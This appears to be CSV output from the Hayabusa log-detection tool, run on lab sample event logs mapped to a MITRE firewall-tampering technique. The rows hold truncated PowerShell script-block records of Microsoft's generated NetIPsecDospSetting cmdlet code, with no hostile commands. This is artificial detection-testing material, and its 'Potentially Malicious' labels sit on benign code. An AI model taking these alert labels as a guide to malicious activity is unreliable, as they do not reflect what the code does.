$false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
